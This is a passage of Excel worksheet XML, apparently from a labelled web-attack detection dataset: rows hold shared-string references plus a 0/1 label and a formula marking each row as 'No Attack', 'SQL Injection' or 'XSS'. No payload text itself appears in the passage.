      <c r="B28043">
        <v>0</v>
      </c>
      <c r="C28043" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28044" s="1" t="s">
        <v>10280</v>
      </c>
      <c r="B28044">
        <v>0</v>
      </c>
      <c r="C28044" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28045" s="1" t="s">
        <v>10892</v>
      </c>
      <c r="B28045">
        <v>0</v>
      </c>
      <c r="C28045" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28046" s="1" t="s">
        <v>10281</v>
      </c>
      <c r="B28046">
        <v>0</v>
      </c>
      <c r="C28046" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28047" s="1" t="s">
        <v>10282</v>
      </c>
      <c r="B28047">
        <v>0</v>
      </c>
      <c r="C28047" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28048" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28048" s="1" t="s">
        <v>10283</v>
      </c>
      <c r="B28048">
        <v>0</v>
      </c>
      <c r="C28048" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28049" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28049" s="1" t="s">
        <v>10284</v>
      </c>
      <c r="B28049">
        <v>0</v>
      </c>
      <c r="C28049" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28050" s="1" t="s">
        <v>10285</v>
      </c>
      <c r="B28050">
        <v>0</v>
      </c>
      <c r="C28050" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28051" spans="1:3" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A28051" s="1" t="s">
        <v>10286</v>
      </c>
      <c r="B28051">
        <v>0</v>
      </c>
      <c r="C28051" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28052" s="1" t="s">
        <v>10287</v>
      </c>
      <c r="B28052">
        <v>0</v>
      </c>
      <c r="C28052" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28053" spans="1:3" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A28053" s="1" t="s">
        <v>10288</v>
      </c>
      <c r="B28053">
        <v>0</v>
      </c>
      <c r="C28053" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28054" spans="1:3" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A28054" s="1" t="s">
        <v>10289</v>
      </c>
      <c r="B28054">
        <v>0</v>
      </c>
      <c r="C28054" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28055" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28055" s="1" t="s">
        <v>10259</v>
      </c>
      <c r="B28055">
        <v>0</v>
      </c>
      <c r="C28055" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28056" s="1" t="s">
        <v>10290</v>
      </c>
      <c r="B28056">
        <v>0</v>
      </c>
      <c r="C28056" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28057" s="1" t="s">
        <v>10291</v>
      </c>
      <c r="B28057">
        <v>0</v>
      </c>
      <c r="C28057" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28058" s="1" t="s">
        <v>10254</v>
      </c>
      <c r="B28058">
        <v>0</v>
      </c>
      <c r="C28058" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28059" s="1" t="s">
        <v>10255</v>
      </c>
      <c r="B28059">
        <v>0</v>
      </c>
      <c r="C28059" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28060" s="1" t="s">
        <v>10256</v>
      </c>
      <c r="B28060">
        <v>0</v>
      </c>
      <c r="C28060" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28061" s="1" t="s">
        <v>10257</v>
      </c>
      <c r="B28061">
        <v>0</v>
      </c>
      <c r="C28061" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28062" s="1" t="s">
        <v>10258</v>
      </c>
      <c r="B28062">
        <v>0</v>
      </c>
      <c r="C28062" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28063" spans="1:3" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A28063" s="1" t="s">
        <v>10903</v>
      </c>
      <c r="B28063">
        <v>0</v>
      </c>
      <c r="C28063" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28064" s="1" t="s">
        <v>10904</v>
      </c>
      <c r="B28064">
        <v>0</v>
      </c>
      <c r="C28064" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28065" s="1" t="s">
        <v>10905</v>
      </c>
      <c r="B28065">
        <v>0</v>
      </c>
      <c r="C28065" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28066" s="1" t="s">
        <v>10906</v>
      </c>
      <c r="B28066">
        <v>0</v>
      </c>
      <c r="C28066" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28067" s="1" t="s">
        <v>10292</v>
      </c>
      <c r="B28067">
        <v>0</v>
      </c>
      <c r="C28067" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28068" s="1" t="s">
        <v>10293</v>
      </c>
      <c r="B28068">
        <v>0</v>
      </c>
      <c r="C28068" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28069" s="1" t="s">
        <v>10294</v>
      </c>
      <c r="B28069">
        <v>0</v>
      </c>
      <c r="C28069" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28070" s="1" t="s">
        <v>10295</v>
      </c>
      <c r="B28070">
        <v>0</v>
      </c>
      <c r="C28070" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28071" s="1" t="s">
        <v>134</v>
      </c>
      <c r="B28071">
        <v>1</v>
      </c>
      <c r="C28071" s="7" t="str">
        <f t="shared" si="438"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="28072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28072" s="1" t="s">
        <v>135</v>
      </c>
      <c r="B28072">
        <v>1</v>
      </c>
      <c r="C28072" s="7" t="str">
        <f t="shared" si="438"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="28073" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28073" s="1" t="s">
        <v>10297</v>
      </c>
      <c r="B28073">
        <v>0</v>
      </c>
      <c r="C28073" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28074" spans="1:3" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A28074" s="1" t="s">
        <v>10298</v>
      </c>
      <c r="B28074">
        <v>0</v>
      </c>
      <c r="C28074" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28075" spans="1:3" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A28075" s="1" t="s">
        <v>10299</v>
      </c>
      <c r="B28075">
        <v>0</v>
      </c>
      <c r="C28075" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28076" s="1" t="s">
        <v>10300</v>
      </c>
      <c r="B28076">
        <v>0</v>
      </c>
      <c r="C28076" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28077" s="1" t="s">
        <v>10301</v>
      </c>
      <c r="B28077">
        <v>0</v>
      </c>
      <c r="C28077" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28078" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28078" s="1" t="s">
        <v>10302</v>
      </c>
      <c r="B28078">
        <v>0</v>
      </c>
      <c r="C28078" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28079" s="1" t="s">
        <v>10303</v>
      </c>
      <c r="B28079">
        <v>0</v>
      </c>
      <c r="C28079" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28080" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28080" s="1" t="s">
        <v>10304</v>
      </c>
      <c r="B28080">
        <v>0</v>
      </c>
      <c r="C28080" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28081" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28081" s="1" t="s">
        <v>10305</v>
      </c>
      <c r="B28081">
        <v>0</v>
      </c>
      <c r="C28081" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28082" s="1" t="s">
        <v>10296</v>
      </c>
      <c r="B28082">
        <v>0</v>
      </c>
      <c r="C28082" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28083" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A28083" s="1" t="s">
        <v>10907</v>
      </c>
      <c r="B28083">
        <v>0</v>
      </c>
      <c r="C28083" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28084" s="1" t="s">
        <v>34185</v>
      </c>
      <c r="B28084">
        <v>0</v>
      </c>
      <c r="C28084" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28085" s="1" t="s">
        <v>31436</v>
      </c>
      <c r="B28085">
        <v>0</v>
      </c>
      <c r="C28085" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28086" s="1" t="s">
        <v>24222</v>
      </c>
      <c r="B28086">
        <v>0</v>
      </c>
      <c r="C28086" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28087" s="1" t="s">
        <v>30722</v>
      </c>
      <c r="B28087">
        <v>0</v>
      </c>
      <c r="C28087" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28088" s="1" t="s">
        <v>32930</v>
      </c>
      <c r="B28088">
        <v>0</v>
      </c>
      <c r="C28088" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28089" s="1" t="s">
        <v>28301</v>
      </c>
      <c r="B28089">
        <v>0</v>
      </c>
      <c r="C28089" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28090" s="1" t="s">
        <v>20192</v>
      </c>
      <c r="B28090">
        <v>0</v>
      </c>
      <c r="C28090" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28091" s="1" t="s">
        <v>32701</v>
      </c>
      <c r="B28091">
        <v>0</v>
      </c>
      <c r="C28091" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28092" s="1" t="s">
        <v>32232</v>
      </c>
      <c r="B28092">
        <v>0</v>
      </c>
      <c r="C28092" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28093" s="1" t="s">
        <v>33676</v>
      </c>
      <c r="B28093">
        <v>0</v>
      </c>
      <c r="C28093" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28094" s="1" t="s">
        <v>29318</v>
      </c>
      <c r="B28094">
        <v>0</v>
      </c>
      <c r="C28094" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28095" s="1" t="s">
        <v>35217</v>
      </c>
      <c r="B28095">
        <v>0</v>
      </c>
      <c r="C28095" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28096" s="1" t="s">
        <v>33108</v>
      </c>
      <c r="B28096">
        <v>0</v>
      </c>
      <c r="C28096" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28097" s="1" t="s">
        <v>21338</v>
      </c>
      <c r="B28097">
        <v>0</v>
      </c>
      <c r="C28097" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28098" s="1" t="s">
        <v>32472</v>
      </c>
      <c r="B28098">
        <v>0</v>
      </c>
      <c r="C28098" s="7" t="str">
        <f t="shared" si="438"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28099" s="1" t="s">
        <v>27813</v>
      </c>
      <c r="B28099">
        <v>0</v>
      </c>
      <c r="C28099" s="7" t="str">
        <f t="shared" ref="C28099:C28162" si="439">IF(B28099=0,"No Attack", IF(B28099=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28100" s="1" t="s">
        <v>23595</v>
      </c>
      <c r="B28100">
        <v>0</v>
      </c>
      <c r="C28100" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28101" s="1" t="s">
        <v>37530</v>
      </c>
      <c r="B28101">
        <v>0</v>
      </c>
      <c r="C28101" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28102" s="1" t="s">
        <v>36476</v>
      </c>
      <c r="B28102">
        <v>0</v>
      </c>
      <c r="C28102" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28103" s="1" t="s">
        <v>20735</v>
      </c>
      <c r="B28103">
        <v>0</v>
      </c>
      <c r="C28103" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28104" s="1" t="s">
        <v>33637</v>
      </c>
      <c r="B28104">
        <v>0</v>
      </c>
      <c r="C28104" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28105" s="1" t="s">
        <v>28380</v>
      </c>
      <c r="B28105">
        <v>0</v>
      </c>
      <c r="C28105" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28106" s="1" t="s">
        <v>27947</v>
      </c>
      <c r="B28106">
        <v>0</v>
      </c>
      <c r="C28106" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28107" s="1" t="s">
        <v>27540</v>
      </c>
      <c r="B28107">
        <v>0</v>
      </c>
      <c r="C28107" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28108" s="1" t="s">
        <v>37175</v>
      </c>
      <c r="B28108">
        <v>0</v>
      </c>
      <c r="C28108" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28109" s="1" t="s">
        <v>36656</v>
      </c>
      <c r="B28109">
        <v>0</v>
      </c>
      <c r="C28109" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28110" s="1" t="s">
        <v>37222</v>
      </c>
      <c r="B28110">
        <v>0</v>
      </c>
      <c r="C28110" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28111" s="1" t="s">
        <v>32418</v>
      </c>
      <c r="B28111">
        <v>0</v>
      </c>
      <c r="C28111" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28112" s="1" t="s">
        <v>28469</v>
      </c>
      <c r="B28112">
        <v>0</v>
      </c>
      <c r="C28112" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28113" s="1" t="s">
        <v>33191</v>
      </c>
      <c r="B28113">
        <v>0</v>
      </c>
      <c r="C28113" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28114" s="1" t="s">
        <v>22930</v>
      </c>
      <c r="B28114">
        <v>0</v>
      </c>
      <c r="C28114" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28115" s="1" t="s">
        <v>20581</v>
      </c>
      <c r="B28115">
        <v>0</v>
      </c>
      <c r="C28115" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28116" s="1" t="s">
        <v>28025</v>
      </c>
      <c r="B28116">
        <v>0</v>
      </c>
      <c r="C28116" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28117" s="1" t="s">
        <v>34620</v>
      </c>
      <c r="B28117">
        <v>0</v>
      </c>
      <c r="C28117" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28118" s="1" t="s">
        <v>29416</v>
      </c>
      <c r="B28118">
        <v>0</v>
      </c>
      <c r="C28118" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28119" s="1" t="s">
        <v>21739</v>
      </c>
      <c r="B28119">
        <v>0</v>
      </c>
      <c r="C28119" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28120" s="1" t="s">
        <v>30514</v>
      </c>
      <c r="B28120">
        <v>0</v>
      </c>
      <c r="C28120" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28121" s="1" t="s">
        <v>22378</v>
      </c>
      <c r="B28121">
        <v>0</v>
      </c>
      <c r="C28121" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28122" s="1" t="s">
        <v>22986</v>
      </c>
      <c r="B28122">
        <v>0</v>
      </c>
      <c r="C28122" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28123" s="1" t="s">
        <v>30517</v>
      </c>
      <c r="B28123">
        <v>0</v>
      </c>
      <c r="C28123" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28124" s="1" t="s">
        <v>31412</v>
      </c>
      <c r="B28124">
        <v>0</v>
      </c>
      <c r="C28124" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28125" s="1" t="s">
        <v>27170</v>
      </c>
      <c r="B28125">
        <v>0</v>
      </c>
      <c r="C28125" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28126" s="1" t="s">
        <v>34234</v>
      </c>
      <c r="B28126">
        <v>0</v>
      </c>
      <c r="C28126" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28127" s="1" t="s">
        <v>27339</v>
      </c>
      <c r="B28127">
        <v>0</v>
      </c>
      <c r="C28127" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28128" s="1" t="s">
        <v>32463</v>
      </c>
      <c r="B28128">
        <v>0</v>
      </c>
      <c r="C28128" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28129" s="1" t="s">
        <v>29056</v>
      </c>
      <c r="B28129">
        <v>0</v>
      </c>
      <c r="C28129" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28130" s="1" t="s">
        <v>27862</v>
      </c>
      <c r="B28130">
        <v>0</v>
      </c>
      <c r="C28130" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28131" s="1" t="s">
        <v>35720</v>
      </c>
      <c r="B28131">
        <v>0</v>
      </c>
      <c r="C28131" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28132" s="1" t="s">
        <v>30171</v>
      </c>
      <c r="B28132">
        <v>0</v>
      </c>
      <c r="C28132" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28133" s="1" t="s">
        <v>32759</v>
      </c>
      <c r="B28133">
        <v>0</v>
      </c>
      <c r="C28133" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28134" s="1" t="s">
        <v>34677</v>
      </c>
      <c r="B28134">
        <v>0</v>
      </c>
      <c r="C28134" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28135" s="1" t="s">
        <v>20753</v>
      </c>
      <c r="B28135">
        <v>0</v>
      </c>
      <c r="C28135" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28136" s="1" t="s">
        <v>33083</v>
      </c>
      <c r="B28136">
        <v>0</v>
      </c>
      <c r="C28136" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28137" s="1" t="s">
        <v>32398</v>
      </c>
      <c r="B28137">
        <v>0</v>
      </c>
      <c r="C28137" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28138" s="1" t="s">
        <v>27605</v>
      </c>
      <c r="B28138">
        <v>0</v>
      </c>
      <c r="C28138" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28139" s="1" t="s">
        <v>36702</v>
      </c>
      <c r="B28139">
        <v>0</v>
      </c>
      <c r="C28139" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28140" s="1" t="s">
        <v>36720</v>
      </c>
      <c r="B28140">
        <v>0</v>
      </c>
      <c r="C28140" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28141" s="1" t="s">
        <v>29636</v>
      </c>
      <c r="B28141">
        <v>0</v>
      </c>
      <c r="C28141" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28142" s="1" t="s">
        <v>35121</v>
      </c>
      <c r="B28142">
        <v>0</v>
      </c>
      <c r="C28142" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28143" s="1" t="s">
        <v>20136</v>
      </c>
      <c r="B28143">
        <v>0</v>
      </c>
      <c r="C28143" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28144" s="1" t="s">
        <v>28415</v>
      </c>
      <c r="B28144">
        <v>0</v>
      </c>
      <c r="C28144" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28145" s="1" t="s">
        <v>36230</v>
      </c>
      <c r="B28145">
        <v>0</v>
      </c>
      <c r="C28145" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28146" s="1" t="s">
        <v>28802</v>
      </c>
      <c r="B28146">
        <v>0</v>
      </c>
      <c r="C28146" s="7" t="str">
        <f t="shared" si="439"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="28147" spans="1:3" x14ac:dyDescent="0.3">
